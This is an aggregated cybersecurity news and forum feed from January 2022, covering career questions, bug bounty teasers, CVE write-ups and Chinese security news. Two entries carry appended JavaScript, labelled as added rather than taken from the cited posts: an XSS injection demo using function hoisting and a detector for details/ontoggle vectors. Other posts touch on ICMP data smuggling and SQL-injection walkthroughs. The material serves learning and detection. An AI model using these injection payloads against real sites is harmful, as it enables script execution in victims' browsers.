    Hi Everyone, I need some help finding compensation resources. Our security team has been having conflict over compensation with our HR compensation team. We want them to change the compensation band for a Mid-Level Security Analyst because the starting salary is $90k (105 Overall COL area). They tell us they want to start roles at 85% of the grade for the band, which is around $70k-$80k. The role requires 5 years of IT exp with 2+ of Security. They claim they have done research but won't share their evidence, stating the role is graded properly. It doesn't seem to align with what I have been seeing for other jobs, what people are asking for, or what I found on NIST NICE. What resources are out there to help identify compensation for roles in cyber by industry (i.e. e-commerce, higher ed, govt, etc)? I want to bring something to them that says we are way below market and cannot be competitive, but they seem to know otherwise. EDIT: I'm the hiring manager for the role. submitted by /u/gnomeparadox
    How anonymous is an Azure/AWS VM?
    I would like to mess with some scammers but would like to stay fairly anonymous. Am I correctly understanding that my identity is fairly safe when using a VM on Azure or AWS? I am aware MS/Amazon could still pass my identity to the government, but I'm not worried about that. My main concern is to stay hidden from the scammers. Thanks in advance for your reply. submitted by /u/LouTr0n
    Python and C++ Hacking Projects
    What are good cybersecurity projects for someone who is a beginner-intermediate in hacking? submitted by /u/Odd_Rip6706
    How does my university perform MITM monitoring on secure HTTPS connections?
    Hi AskNetsec, after suspicions towards my university's network provider (Eduroam), I have been digging into the extent to which they do, and/or are able to, monitor the activity of the students while on the network. Besides the rather normal DNS restrictions, of monitoring and blocking potentially harmful DNS requests, or in this case redirecting to a custom warning page, I have discovered something I would consider unusual. When accessing certain websites with a secure connection, HTTPS, the certificate for the website is tampered with. Meaning that the certificate for a given website, when requested through the university network, is not identical to the certificate returned when requesting from any other network. When digging deeper into the certificates, I found that custom …

    How to find prospects for free?
    Want to build a prospecting list quickly and for free? Continue reading on Medium »
    Fun with Google Maps
    I recently posted a Tweet stating that one is able to search Google Maps by name, username, email, phone number, area code…in fact… Continue reading on Medium »
    Social Media OSINT
    Searching for accounts by username across social media applications. Continue reading on Medium »
    SpiderFoot (Automate OSINT for Threat Intelligence)
    About SpiderFoot Continue reading on Medium »

    Bug Bounty: earn up to 100,000 PTP
    (at the time of writing, 100k PTP > $1M) Continue reading on Medium »
    Hacking with Subdomain3
    Subdomain3 is a great tool that can be used to discover subdomains that belong to a website. The tool is written in Python3. Continue reading on Medium »
    Live Bug Bounty Training With My Strategy and Let’s hit easily Bounties Together in this year
    Hello Cybersecurity Researchers, again I’m here after a lot of texts received on my LinkedIn and Instagram asking when I launch my Live Bug… Continue reading on Medium »
    How I messed up my own profile data
    Just wanted to share one of my experiences which I had while testing one of the web applications. I will be brief so that I do not waste… Continue reading on Medium »
    Top 25 Server-Side Request Forgery (SSRF) Bug Bounty Reports
    In this article, we will discuss the Server-Side Request Forgery (SSRF) vulnerability, and present 25 disclosed reports based on this flaw. Continue reading on Medium »
    Extreme Hacking Mindset
    How to dominate in bug bounties Continue reading on Medium »
    How I found High-Priority PII leak through web archive
    Hello Hackers, Aditya here. I am a cyber security student and bug bounty hunter. Continue reading on Medium »

    CryptoLyzer: A comprehensive cryptographic settings analyzer (introduction with a comparison of cryptographic settings analyzers)
    submitted by /u/c0r0n3r
    Privilege escalation in Acer Care Center by @last0x00 and @APTortellini
    submitted by /u/last0x00
    Introducing TREVORproxy and TREVORspray 2.0
    submitted by /u/aconite33
    Gorillas: Special offer - unicorn slices, 150g 🦍❤️
    submitted by /u/moviuro
    Demonstrating how phishermen abuse free hosting
    submitted by /u/df_works
    SeeYouCM-Thief: Exploiting common misconfigurations in Cisco phone systems
    submitted by /u/HackingLZ

    Operation Falcon II: Unit 42 Helps INTERPOL Identify Nigerian Business Email Compromise Ring Members
    Operation Falcon II, championed by INTERPOL and The Nigeria Police Force, led to the arrest of a number of Nigerian business email compromise actors. The post Operation Falcon II: Unit 42 Helps INTERPOL Identify Nigerian Business Email Compromise Ring Members appeared first on Unit42.

    SecWiki News 2022-01-19 Review
    An APT group tracking method based on context-aware computing, by ourren; 2021 Global DDoS Threat Report, by ourren; Who touched my DevOps: DevOps risk mapping, by ourren. For more recent articles, visit SecWiki.

    How Do You Know What "Bad" Looks Like?
    From the time I started in DFIR, one question was always at the forefront of incident responders' minds...how do you know what "bad" looks like? When I was heading on-site during those early engagements, that question was foremost on my mind, and very often, the reason I couldn't sleep on the plane, even on the long, cross-country flights. As I gained experience, I started to have a sense of what "bad" might or could look like, and that question started coming from the folks around me (IT staff, etc.) while I was on-site. How do you know what "bad" looks like? The most obvious answer to the question is, clearly, "anything that's not "good"...". However, that doesn't really answer the question, does it? Back in the late '90s, I did a vulnerability assessment for an organization, and at one …

    Writer HackTheBox Walkthrough
    Introduction: Writer is a CTF Linux box with difficulty rated as “medium” on the HackTheBox platform. The machine covers a SQL injection vulnerability and privilege escalation. The post Writer HackTheBox Walkthrough appeared first on Hacking Articles.

    [Security Bulletin] Weblogic January update fixes multiple high-risk vulnerabilities
    Oracle recently released its January 2022 security update, covering 497 vulnerabilities across its products (Weblogic Server, Database Server, Java SE, MySQL, etc.). Among the vulnerabilities fixed this time...

    Discovering a security vulnerability in a major grocery delivery platform
    Article URL: https://zerforschung.org/posts/gorillas-en/ | Comments URL: https://news.ycombinator.com/item?id=29991743 | Points: 235 | Comments: 70

    Linux malware infections grew 35% in 2021
    According to statistics, malware infections targeting Linux devices rose 35% during 2021.
    FreeBuf Morning Report | US scrutinizes Alibaba's cloud business; US Democrats propose bill banning online surveillance advertising
    Fashion giant Moncler confirmed a data breach after files stolen by the AlphV/BlackCat ransomware operation in December were published on the dark web.
    Fashion giant confirms ransomware attack, 11 million phones infected with trojan | January 19 global cybersecurity hotspots
    Cybercrime case analysis: ticket-scalping crawlers (Part 40)
    Developing a crawler to snap up tickets and illegally profiting 120,000 yuan constituted the crime of providing programs and tools for intruding into or illegally controlling computer information systems, punished with three years of imprisonment.
    APT Group Archive | Analysis of APT group activity trends in 2021
    This article is one of a series interpreting highlights of the "APT Group Intelligence Research Yearbook"; this installment mainly introduces NSFOCUS's (绿盟科技) 2021 work, mentioned in the yearbook, based on a crawler framework and knowledge-graph natural language processing technology.
    US Department of Commerce publishes the minimum elements for a Software Bill of Materials (SBOM)
    Defining the minimum elements of an SBOM is an iterative process. This report is a starting point, not a final word.
    Critical SAP vulnerability could enable supply chain attacks
    CVE-2021-38178 has a CVSS score of 9.1, and its patch was released on SAP's October 2021 Patch Day. The vulnerability is described as an improper authorization issue that could allow an attacker to tamper with transport requests, bypassing quality gates and moving code artifacts into production systems.

    CVE-2021-22204 GitLab RCE: In-depth analysis of the exiftool code execution vulnerability (Part 2)
    Contents: 1 Preface; 2 Prerequisites; 2.1 JPEG file format; 2.2 Perl pattern matching; 3 From exiftool source debugging to vulnerability analysis; 3.1 Environment setup; 3.2 Vulnerability overview; 3.3 How exiftool parses the embedded 0xc51b tag; 3.4 How exiftool calls the parseAnt function; 3.5 Analysis of the parseAnt function; 3.6 Analysis of the parseAnt vulnerability; 4 Exploitation; 4.1 DjVu file generation; 4.2 JPG file generation; 5 Fix; 6 Summary. Preface: On April 7, security researcher vakzz submitted an RCE vulnerability in gitlab on hackerone; at the time it was not stated whether exploitation required logging in to gitlab. On October 25, a foreign security company found unauthenticated exploitation in the wild through log analysis and discovered a new exploitation method. According to the official vulnerability advisory page, the safe versions are 13.10.3, 13.9.6 and 13.8.8. The vulnerability has two parts: CVE-2021-22005 Gitlab unauthenticated exiftool RCE CVE-2021-22004. The previous article, "CVE-2021-22205 GitLab RCE: In-depth analysis of unauthenticated access (Part 1)", reproduced and analyzed the first part, namely how a request carrying a malicious file is passed through gitlab to exiftool for parsing; next I will analyze the principle of the exiftool vulnerability and its final triggering and exploitation. I hope readers gain something from it and form their own insights. Prerequisites: As before, in this article I will also go over some background knowledge so that readers can understand the vulnerability more deeply and generalize from it. JPEG file format: This vulnerability can be triggered by reading the EXIF information of a normal JPG image file, and the JPEG file format directly defines the e…


    Is month of birth considered PII when combined with name (in California if that’s relevant?)
    I would like to add month of birth (without day/date/year) as criteria in a new active directory build, but cannot find a clear-cut answer as to whether this is considered PII or not. Thank you in advance. submitted by /u/erpa2b
    Is This Memory Diagram From Practical Malware Analysis Correct?
    I am reading through Practical Malware Analysis and I came across an image of a program's memory layout (Page 69). I have always understood that the stack started at a high memory address and grew towards a lower address, but the diagram in the book shows otherwise. Is there some aspect of this figure I am misinterpreting, or is there a reason why this specific image is different from the stack I am accustomed to? Image in the Book: https://i.imgur.com/vLtI3eC.png My Current Interpretation of Memory: https://i.imgur.com/Rt7H4Oj.png Thanks for the help! *Reposted from r/netsecstudents submitted by /u/pufftux
    Taking notes while learning a course
    Hi everyone, I am currently working as a cyber security analyst with about 1.8 years of endpoint security experience and overall 6 years of cyber security experience. I would like your opinion on whether taking notes while you are learning a course, like say Wireshark or Linux, is necessary. If no, why? If yes, what is the best way to take notes on something like OneNote, as I feel it's difficult to take notes while watching a video? submitted by /u/aaronthecoolgnome
    Client Certificate Authentication check
    In my company we need to implement Client Certificate Authentication in our web service. Certificates should be self-signed and generated by the client. Then they send us the certificate without the private key. My idea is that we store these certificates in the database. Now, I am not sure which field I should use to check the authenticity of the certificate: thumbprint, subject, something else, or multiple fields? I could also completely check the public key in the database against the public key from the incoming certificate. What are the recommendations for this scenario? submitted by /u/mandaric
    Understanding host.cnf, DNS, and how to tie it all together?
    I'm currently doing CronOS on HTB. I realize that 1.) 8.8.8.8 will not translate the internal IP address of 10.10.10.7. Then what will? And how do I find the correct DNS server that will? 2.) I need to add 10.10.10.7 cronos.htb into /etc/host.cnf. I know by reading that you were supposed to enumerate the hostname because not all hostnames are [nameOfBox].htb... but how was I supposed to know that cronos.htb was the hostname? How do I find out? 3.) Why did "dig axfr xxxx.htb @10.10.10.xx" work? Also, what knowledge am I missing here? I read up on DNS zone transfer attacks and general stuff about DNS, but I'm just not connecting it maybe? I think this topic is very important in the future in regards to large corporate internal networks. I could use some guidance! Reso…
    Understanding host.cnf, DNS, and how to tie it all together?
    I'm currently doing CronOS on HTB. I realize that 1.) 8.8.8.8 will not translate the internal IP address of 10.10.10.7. Then what will? And how do I find the correct DNS server that will? 2.) I need to add 10.10.10.7 cronos.htb into /etc/host.cnf. I know by reading that you were supposed to enumerate the hostname because not all hostnames are [nameOfBox].htb... but how was I supposed to know that cronos.htb was the hostname? How do I find out? Also, what knowledge am I missing here? I read up on DNS zone transfer attacks and general stuff about DNS, but I'm just not connecting it maybe? I think this topic is very important in the future in regards to large corporate internal networks. I could use some guidance! Resources I've read so far (for those that stumble on this th…
    NIST compliant web application scanners
    What are some NIST compliant web app vulnerability scanners that you have come across? 50+ targets. submitted by /u/Dalgan
    Where can I view a full list of MDE detection and alerting rules?
    I've looked everywhere, but it seems like this should be available. submitted by /u/slnt1996
    Can a server send an echo reply with different data?
    I know that's an unusual question, but I know I can send data to my server using ICMP packets (hiding in the last 48 bytes of the packet; it could be more, but that could be suspicious), but can I receive data from the server? Looking at Wireshark, I realized the payload was the same in the reply. submitted by /u/_JesusChrist_hentai
    Trying to set up an isolated node on a LAN network
    I have a secondary router off of my main network that I am trying to make as invisible to the rest of the network as I can. Off of that router I am trying to configure a Raspberry Pi 4B so it is as secure as I can make it. Potential threat vectors include individuals and small groups. submitted by /u/alonelyvoicespeaks

    BlueTeamLabs.Online
    Has anyone tried BlueTeamLabs.Online? I read there was a forensics pathway. Does anyone know if the forensics pathway is any good? Thanks! submitted by /u/DeadBirdRugby
    Check Authenticity of Zip Creation Date
    Hello guys, I need help! Basically, a friend of mine mistakenly submitted the wrong assignment (zip file); later on he realized and emailed the teacher explaining the situation and attaching the right assignment's (zip file) creation and modification date as proof. The teacher says that anyone can revert the OS date and zip the file, resulting in an inauthentic creation date for the zip file. My friend wants to find a method to prove to the teacher that the right assignment (zip file) was done on time and its creation date & modification date are authentic. My friend uses Windows 10 and is in desperate need of help. Any help will be deeply appreciated. submitted by /u/themidfinger007
    FORENSIC SOFTWARE RECOMMENDATION
    submitted by /u/tsipikau

    Zooming in on Zero-click Exploits (Project Zero)
    submitted by /u/albinowax
    A Beginner’s guide into Router Hacking and Firmware Emulation
    submitted by /u/secnigma
    Vulnerable AWS Lambda function - Initial access in cloud attacks
    submitted by /u/MiguelHzBz
    Telenot Complex: Insecure AES Key Generation
    submitted by /u/0xdea
    Dahua DVRs and Webcams bruteforcer at port 37777
    submitted by /u/falx1fer
    Robust and blazing fast open-redirect vulnerability scanner with the ability to recursively crawl all web forms, entry points, or links with data.
    submitted by /u/falx1fer
    Mixed Messages: Busting Box’s MFA Methods | Varonis
    submitted by /u/VaronisThreatLabs
    How to securely implement TLS certificate checking in Android apps
    submitted by /u/Masrepus
    An attempt to understand container runtime
    submitted by /u/alt-glitch
    Public exploit POC for critical Windows HTTP RCE impacting multiple Windows versions
    submitted by /u/markcartertm
    Stealing administrative JWTs through post-auth SSRF - VMWare Workspace One Access (CVE-2021-22056)
    submitted by /u/Mempodipper

    Destructive malware targeting Ukrainian organizations
    submitted by /u/SCI_Rusher
    How to Analyze Malicious Microsoft Office Files
    submitted by /u/dmchell

    CALISHOT 2022-01: Find ebooks among 373 Calibre sites this month
    Happy New Year, Folks! Here is the fresh new snapshot of the working calibre servers. Some minor improvements are coming with it: the sizes are now displayed, and the links to the covers are also provided. It's useful, as you may know, that a book is unavailable in real time if the cover is empty, without having to click on the book link. ANNOUNCEMENT: The calibre story started 2 years ago, and during this long travel another sub more focused on this kind of content has been created for various reasons. For this new year, I've decided to stop sharing the calishots in the current sub. If you're still interested in future dumps you can track them on the other one. Other resources will be proposed on it soon, like a wiki, tips, the datasets, original calibres, and some news about related tools like calisuck, calishot... which are now turning into a single new project and will be released soon. Your contributions are also welcome on the sub. submitted by /u/krazybug
    Help with scraping website with static .htm's (without sitemap)
    Hi Reddit, I've been trying to download this website (Cisco RV325 Emulator - Emulator) for full offline usage, and have used a variety of different tools with little success so far. I know it can be done because people have linked zip file downloads for other emulators in the cisco forums. I've tried wget, httrack, archivebox and several online website downloaders; however, the problem I'm facing is as follows: If I download https://www.cisco.com/assets/sol/sb/RV325_Emulators/RV325_Emulator-SB_v1-2-1-14/default.htm I can load up the page locally, but clicking on any of the menu items does nothing. It is just a static page which looks correct but isn't functional. I've tested winhttrack and wget settings of (-m -k), (-r -np -c) and another which uses (-l0), but I can't remember what the rest of the args were. From inspecting some of the urls using the online working version, I can see that each menu item has its own unique .htm page, which can be opened separately (online) if you just wanted to view that page and not be able to traverse to other pages (there is no menu bar). For example: Main Page - https://www.cisco.com/assets/sol/sb/RV325_Emulators/RV325_Emulator-SB_v1-2-1-14/default.htm Using the sidebar to go from Homepage > Port Management > Port setup, the online url is unchanged, but clearly a separate static page for it exists because you can go to https://www.cisco.com/assets/sol/sb/RV325_Emulators/RV325_Emulator-SB_v1-2-1-14/lan_setting.htm and access the same thing (only that page's settings, not anything else). This means that if I downloaded this lan_setting.htm page and pointed to it in the local html, I should be able to access it, right? The problem is that I don't know how to find all of these individual settings .htm page urls, and downloading them all manually and setting up local links in the main html file would take forever. I hope I've explained this well enough; please accept my apologies in advance if I haven't! submitted by /u/prymenumba
    Worthy Bookmark: The Latest Google Dorks List - Jan 2022 DB Update
    submitted by /u/little_maggot

    Russian Roulette: Using Optical Character Recognition to investigate military equipment transfers
    What can we learn about Russian equipment transfers from a single Twitter video? Quite a lot, actually.
    #IMINT #OSINT challenge solution
    This writeup is the solution to a challenge set by Professor Gordon Farrer, for me a reference in this field and a person from whom…

    How To Run Or Install Hakrawler Bug Bounty Tool on Kali Linux
    Hakrawler: tool used to gather URLs and JavaScript file locations.
    Bug Bounty Program — Earn Up to 100,000 PTP
    Learn more about the Platypus.finance bug bounty program.
    My Bug Bounty Adventure -1-
    Greetings from Constantinople to all,
    Introducing the Exponent Bug Bounty Program in Collaboration with Immunefi
    Website | Litepaper | Twitter | Medium | Discord | Bug Bounty Program
    Bug Bounty Recon: Content Discovery (Efficiency pays $)
    Content Discovery: the process of finding vulnerable endpoints; URLs, parameters and resources.
    The New King “Broken Access Control”
    The King (Injection Bug) who was ruling the bug world for more than a decade is now conquered by the New King known as “Broken Access…
    Cross Site Port Attack in Wild
    Hello Hunter, sorry for the delay of this post; this is my first post this year, and I hope you’re all doing well and happy. So without…

    Facing DevSecOps hurdles, federal agencies need a modern approach to security
    Increased threats mean the government can’t sleep on cybersecurity. Learn how federal agencies can improve their security posture without sacrificing innovation.

    SecWiki News 2022-01-18 Review
    A comprehensive analysis of the Israeli “Pegasus” spyware attacks, by ourren. For more recent articles, visit SecWiki.

    Go: Getting Started with Fuzzing
    Article URL: https://go.dev/doc/tutorial/fuzz Comments URL: https://news.ycombinator.com/item?id=29980566

    The Tale of a Click leading to RCE
    In today’s industry, we often hear that humans may weaken a company’s security leading to a potential breach. At ManoMano we highly… (ManoMano Tech Team)

    Top 5 Best Fuzzing & Vulnerability Research TIPS
    submitted by /u/pat_ventuzelo
    Rust vs. C: How are vulnerabilities different? An analysis on the vulnerabilities in the two programming languages and what to look for.
    submitted by /u/ragnarsecurity

    Cybercrime case analysis: the 12306 ticket-scalping industry chain
    Trading citizens' personal information and developing account-registration software constituted the crimes of infringing on citizens' personal information and providing programs for intruding into computer information systems; the defendants were sentenced to three years' imprisonment and the illegal proceeds were confiscated.
    Interview with Xia Luning of 数字认证 (Beijing Certificate Authority): cryptography plus cloud unlocks more security service models
    When traditional cryptographic technology meets the popular “cloud”, cryptography gains new vitality and brings enterprises more advantages.
    Nintendo warns users to beware of fake websites offering Switch discounts
    These sites use official logos to trick Nintendo users and fans into believing they are official pages, and use steep discounts as bait to sell Nintendo products that are very likely counterfeit.
    2021 IoT device CVE leaderboard
    As a company focused on IoT security, we compiled the higher-scoring CVE IDs and descriptions for the following brands.
    Researchers find high-severity vulnerability in three WordPress plugins
    WordPress security company Wordfence discovered a serious vulnerability that affects three different WordPress plugins and has already impacted more than 84,000 websites.
    What is SASE (Secure Access Service Edge)? Concept and use cases in one diagram
    SASE is everywhere; one diagram explains it.
    “Cybersecurity Knowledge Continent” feedback drive with prizes | help us find the flaws
    Knowledge Continent is collecting feedback, with prizes.
    FreeBuf Morning Report | Oracle fixes 483 vulnerabilities in January; Chrome restricts websites' direct access to private networks
    The January 2022 Oracle Critical Patch Update (CPU) states that the update will deliver 483 new security patches; a Critical Patch Update is a collection of patches for multiple security vulnerabilities.
    Zero-trust security market to reach US$64.4 billion by 2027
    China, the world's second-largest economy, is expected to reach a market size of US$11.1 billion by 2027.
    The three biggest malware families in Linux environments
    Linux systems are commonly deployed in IoT devices, and the most common abuse is using IoT devices for DDoS attacks. The top three malware families are XorDDoS, Mirai and Mozi.
    New Apple Safari bug sounds the alarm on cross-site user tracking
    Anti-fraud software company FingerprintJS recently disclosed a flaw in the IndexedDB API implementation in Safari 15 that can be exploited by malicious websites.

    SeeYouCM-Thief: Exploiting common misconfigurations in Cisco phone systems
    Intro: I spent my early IT career working for a Cisco partner that specialized in Cisco phone systems. My work wasn’t directly with the phone systems, but it was usually in an adjacent field like route/switch and security. I did, however, get to see my share of networks that used Cisco phone systems. Today,... (TrustedSec)

    SSRF vulnerability in VMware authentication software could allow access to user data
    Article URL: https://portswigger.net/daily-swig/ssrf-vulnerability-in-vmware-authentication-software-could-allow-access-to-user-data Comments URL: https://news.ycombinator.com/item?id=29978942

    XSS With Hoisting
    When dealing with JavaScript injection scenarios we sometimes get into a difficult situation: the target page is not meant to be accessed directly, and some of its code is supposed to use other code from the intended setup. That leads to broken script blocks, and when the injection context is one of … (Brute XSS)
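    The situation the post describes, as an added example that is not code from the Brute XSS post: a simulated script block calls two helpers, loadProfile() and render(), that a setup script was supposed to define, so on its own the block throws before anything useful runs. A reflected parameter at the end of the block is the injection context. Function declarations are hoisted to the top of their scope, so supplying the missing helpers as declarations anywhere in the block, even after the calls, makes the whole block execute; the same helpers written as function expressions are not hoisted and the block still fails. The page template, helper names and payloads are assumptions constructed for the demonstration.

```javascript
// Added example, not code from the Brute XSS post. Page template, helper
// names and payloads are assumptions constructed for the demonstration.

// A page script that assumes a setup script already defined loadProfile()
// and render(). Without that setup it throws on the first line. The last
// statement reflects a request parameter into a string literal: the
// injection context.
function buildPageScript(param) {
  return [
    'var user = loadProfile();',
    'render(user);',
    'var q = "' + param + '";',
  ].join('\n');
}

// Run a script block in its own scope, as a <script> element does for the
// declarations it contains. `sink` stands in for an attacker-observable
// side effect (an exfil request, for instance).
function runBlock(source, sink) {
  try {
    new Function('sink', source)(sink);
    return { ok: true, error: null };
  } catch (e) {
    return { ok: false, error: e.name + ': ' + e.message };
  }
}

// Reflect `param` into the page script, run it, and report what happened.
function injectAndRun(param) {
  const sink = [];
  const outcome = runBlock(buildPageScript(param), sink);
  return { ok: outcome.ok, error: outcome.error, sink: sink };
}

// Benign value: the page's own code fails before anything interesting runs.
const BENIGN = 'hello';

// Payload that closes the string literal and supplies the missing helpers as
// function *declarations*. Hoisting lifts the declarations to the top of the
// block, so the two calls above now resolve and the payload's render() runs.
const HOISTED_PAYLOAD =
  '";function loadProfile(){return {name:"victim"}}' +
  'function render(u){sink.push(u.name)}//';

// Same helpers as function *expressions*: only the var bindings are hoisted
// (as undefined), so loadProfile() on the first line is still a TypeError.
const EXPRESSION_PAYLOAD =
  '";var loadProfile=function(){return {name:"victim"}};' +
  'var render=function(u){sink.push(u.name)};//';

if (typeof require !== 'undefined' && require.main === module) {
  console.log(injectAndRun(BENIGN));
  console.log(injectAndRun(HOISTED_PAYLOAD));
  console.log(injectAndRun(EXPRESSION_PAYLOAD));
}
```

    The sandbox is `new Function`, not a real document, so the point being shown is the language rule, not a browser quirk: the injected declarations are processed before the first statement executes, which is exactly what lets an injection into an otherwise non-functional block run.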

    IT Security in Web Applications I — Injections
    …form building blocks of many services. In particular, the strategic move of many companies into the cloud underlines the critical…

    Newark Academy CTF (NACTF) 2021 — Challenge Writeups
    This post contains writeups for some challenges in this CTF.
    How to make our own CTF Challenge with ease.
    Hi infosec people, hope you’re healthy! I just got enough time to write a blog on the topic which I really wanted to write, “You can also…
    Day 14, Set Up Environment for Pentesting #100DaysofHacking
    Get all the writeups from Day 1 to 13, Click Here Or Click Here.
    Day 13, Introduction to Pentesting #100DaysofHacking
    Get all the writeups from Day 1 to 12, Click Here Or Click Here
    [Day 4] Web Exploitation Santa’s Running Behind | Advent of Cyber 3 (2021)
    Burp suite practices
    [Day 3] Web Exploitation Christmas Blackout | Advent of Cyber 3 (2021)
    As a penetration tester or defender, we must have an ability to look at the missing or something hidden. And today we will be learning…
    Shibboleth: HackTheBox Walkthrough
    Welcome back! Today we are going to solve another machine from HacktheBox. The box is listed as an easy box. Just add shibboleth.htb in… (InfoSec Write-ups)
    c4ptur3-th3-fl4g (TryHackMe)
    Task 1
    Authentication Bypass -TryHackMe
    Writeup
    SSH to Red Hat with Docker
    Make a docker container with Red Hat and ssh into it

    DOM XSS through ads
    Urban Dictionary disclosed a bug submitted by bemodtwz: https://hackerone.com/reports/889041

    In Chrome, XSS is now possible without the open attribute
    Among XSS vectors there is one that uses the details tag with an ontoggle event handler plus the open attribute. It works in Chrome, Safari, Firefox and IE, and among on*-based XSS vectors it is one of the easier ways to cut down the user interaction required, so it gets used a lot. The recent Chrome 97 update added a new feature, Auto-expand details elements. Taken literally, that means details elements are expanded automatically, which in turn means that a script can be executed immediately with ontoggle alone, without using the open attribute.
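    As an added example, not code from the original post: a scanner for inline on* handlers that does not rely on the open attribute. A detection rule written around the older payload form, details with both open and ontoggle, misses the attribute-less form the post reports for Chrome 97. The function names, regular expressions and sample fragments are assumptions constructed here, and this is a simplified start-tag tokenizer rather than an HTML parser; the detection logic is the point, and a real sanitizer such as DOMPurify belongs in production.

```javascript
// Added example, not code from the original post. Function names, regexes
// and sample fragments are assumptions constructed here. This is a
// simplified tag tokenizer, not an HTML parser; it shows the detection
// logic, and a real sanitizer (e.g. DOMPurify) belongs in production.

// One start tag: name, then attributes (bare, single- or double-quoted).
const TAG_RE = /<([a-zA-Z][\w:-]*)((?:\s+[^\s=>\/]+(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]+))?)*)\s*\/?>/g;
// One attribute inside a start tag.
const ATTR_RE = /([^\s=>\/]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+)))?/g;

// Every inline event handler (on*) in the fragment, with the tag it sits on
// and whether that tag also carries `open`.
function findInlineHandlers(html) {
  const findings = [];
  for (const tagMatch of html.matchAll(TAG_RE)) {
    const tag = tagMatch[1].toLowerCase();
    const attrs = {};
    for (const a of (tagMatch[2] || '').matchAll(ATTR_RE)) {
      attrs[a[1].toLowerCase()] = a[2] ?? a[3] ?? a[4] ?? '';
    }
    for (const [name, value] of Object.entries(attrs)) {
      if (name.startsWith('on')) {
        findings.push({ tag, attr: name, value, hasOpen: 'open' in attrs });
      }
    }
  }
  return findings;
}

// Rule keyed on the classic `<details open ontoggle>` combination: it misses
// the form the post describes, where `open` is absent.
function legacyDetailsRule(html) {
  return findInlineHandlers(html).some(
    (f) => f.tag === 'details' && f.attr === 'ontoggle' && f.hasOpen
  );
}

// Rule that does not depend on `open` at all.
function detailsToggleRule(html) {
  return findInlineHandlers(html).some(
    (f) => f.tag === 'details' && f.attr === 'ontoggle'
  );
}

// Constructed samples.
const CLASSIC_VECTOR = '<details open ontoggle="alert(1)">x</details>';
const CHROME97_VECTOR = '<details ontoggle=alert(1)>x</details>';
const BENIGN_MARKUP = '<p class="note" data-open="1">hello <a href="/x">link</a></p>';
```

    The takeaway for a filter or WAF signature is that the `open` attribute was never the executable part; any on* attribute is, and a rule should key on the handler rather than on the attribute combination that happened to be needed in older browsers.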
    Hello Authz0, a new tool for authorization testing 🚀
    For authorization testing I like to use ZAP's Zest scripts. In the past I often used an extension called Authz in Burp Suite. Either way, because these tools are built into ZAP and Burp Suite, they have the huge advantage of working with raw HTTP requests, but conversely their very detailed features and the mandatory use of raw requests make simple jobs a bit inconvenient. So starting last weekend I built a tool for authorization testing, released it on Sunday afternoon, and want to share it briefly. The tool I am introducing today is Authz0. What is Authz0: Authz0 is a tool that organizes the URLs and roles to test around a YAML-format template file and scans based on it.

    Is Google Authenticator impenetrable?
    Title is hyperbole obviously. Out of the different 2FA methods, SMS was weak because you could get SIM swapped; Authy was weak because a hacker could switch it to their phone if they could get into your email. GA can't be moved from phone to phone, so it can't be taken over by a hacker who gets access to your SIM card and email. My impression is that any account protected by GA is safe. Why is this wrong? submitted by /u/iExtrapolate314
    What is "round tripping" in HTML/GO?
    ELI5 if you can. I'm learning so much from you guys! Thank you! submitted by /u/iExtrapolate314
    Newly created InfoSec role within IT department - what should I be doing to get it right?
    Hello AskNetSec! I'm not sure how else to word the title, so hopefully it's acceptable. Basically, I have been working in different facets of IT for 14 years. My current role is within IT operations as a systems engineer, but it's possibly evolving to be the first true role with an official information security component within the IT department at my company. I'm excited because I've always enjoyed the security aspects of my roles over my career, and my formal education was focused on information security. However, I recognize that I have no formal work experience in a security-specific role, and as such I feel like I'm "winging it". I don't really know what a formalized incident response looks like within an established security department. I don't know what tools I have at my disposal, or should have at my disposal, to do my job effectively. I also realize that I may be overthinking it. But truthfully, I have no point of reference. So I come to you all and ask for some opinions and insights to navigate as the sole person with these newly added responsibilities that I would liken to a security analyst, and do so in a way that makes sense and is effective. I'm happy to do my own reading and self-learning (I have access to PluralSight, if that would be useful), but also hoping maybe someone with experience can give some practical pointers and/or high-level procedural advice since I will likely be shaping this new role in coordination with my management. Thank you all in advance! Edited because my brain moved faster than my fingers could type :( submitted by /u/unseenspecter
    How to create a rule that allows only one country with ModSecurity
    Hi all, does anyone know how to write a rule for ModSecurity to only allow access to a website from one country? I'm currently using this rule: SecGeoLookupDb /usr/share/GeoIP/GeoIP.dat SecRule REMOTE_ADDR "@geoLookup" "chain,id:22,drop,msg:'Non-GB IP address'" SecRule GEO:COUNTRY_CODE "!@streq GB" which is saved in the rules directory as modsecurity_crs_15_customrules.conf. I have also changed the owner of /usr/share/GeoIP/GeoIP.dat to http for nginx. But the website is still getting traffic from outside of the UK. Any help and pointers would be greatly appreciated. submitted by /u/Rurisk89
    Small business honeypot recommendations?
    I started working internal IT for a small business late last year who had been ransomed twice. Their (soon to be) ex MSP still had RDP open to the world, so no wonder... Anyway, among the many other projects currently running I'm considering setting up some honeypots for additional protection. The business still has a number of accounts with weak passwords tied to their applications, so it will be a while before they're sorted out. Is this something that would be worthwhile? And what tools have you used/would recommend? I'm looking for open source if/where possible. Thank you in advance :D submitted by /u/brettfk
    Can HTTPS web traffic over a VPN be intercepted & decrypted if the router the PC is connected to is compromised? Can an attacker do this with tools available on a smartphone?
    submitted by /u/ferengiprophet
    Can I make sure a pdf is clean by "printing to pdf" before sending?
    I want to email a pdf I downloaded from Library Genesis. It's an old scanned book I couldn't find anywhere else. I need to share it, but on the off chance there's anything malicious there, is there anything I can do to send a "cleaned" version? If I create a new pdf by printing to pdf, would that be safe? submitted by /u/sonsa_geistov
    What is an XSS injection? How is it used? What vulnerabilities does it create?
    Also, someone elsewhere on the internet claimed that XSS can get around Cloudflare. How? submitted by /u/iExtrapolate314

    Lots of movies and TV shows in the "disk" folders, download speed is decent
    submitted by /u/feelingsupersonic
    Browser Extension for Saving Images As While Browsing
